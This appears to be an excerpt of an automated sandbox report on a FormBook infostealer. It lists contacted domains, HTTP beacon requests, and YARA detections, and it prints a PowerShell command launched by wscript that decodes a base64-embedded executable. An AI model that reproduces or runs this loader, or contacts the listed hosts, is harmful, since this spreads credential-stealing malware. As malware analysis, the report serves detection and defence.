          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krmq9w.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krmq9w.cfd/g94s/www.qsmdrkjw.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krmq9w.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfd/g94s/www.latamgradoenenfermeria.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lajzznhk.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.com/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.com/g94s/www.styledinfaith.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.latamgradoenenfermeria.comReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzz
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzz/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzz/g94s/www.justinwdong.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lojq5vh.buzzReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfd/g94s/www.lajzznhk.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qsmdrkjw.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfd/g94s/www.krmq9w.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rixiojjl.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.com/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.com/g94s/www.xnmshx.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.comReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfd/g94s/www.93txm.live
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfd/g94s/www.lojq5vh.buzz
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfdReferer:
          Source: unknownDNS traffic detected: queries for: freswe.click
          Source: C:\Windows\explorer.exeCode function: 4_2_07554F82 getaddrinfo,setsockopt,recv,4_2_07554F82
          Source: global trafficHTTP traffic detected: GET /v/sino.txt HTTP/1.1Host: freswe.clickConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd HTTP/1.1Host: www.apinspect.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoe HTTP/1.1Host: www.baroevent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+ HTTP/1.1Host: www.hyperpigmentation-91528.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGd HTTP/1.1Host: www.qsmdrkjw.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFy HTTP/1.1Host: www.lajzznhk.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.906043086.000000000756C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: powershell.exe PID: 5468, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 5896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmmon32.exe PID: 5912, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJmMmGQAAAAAAAAAAOAAAiELAVAAAEYAAAAGAAAAAAAAGmQAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMVjAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADEYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAIEQAAAAgAAAARgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABIAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAATAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAD5YwAAAAAAAEgAAAACAAUAuDEAAAQvAAADAAAAAAAAALxgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCg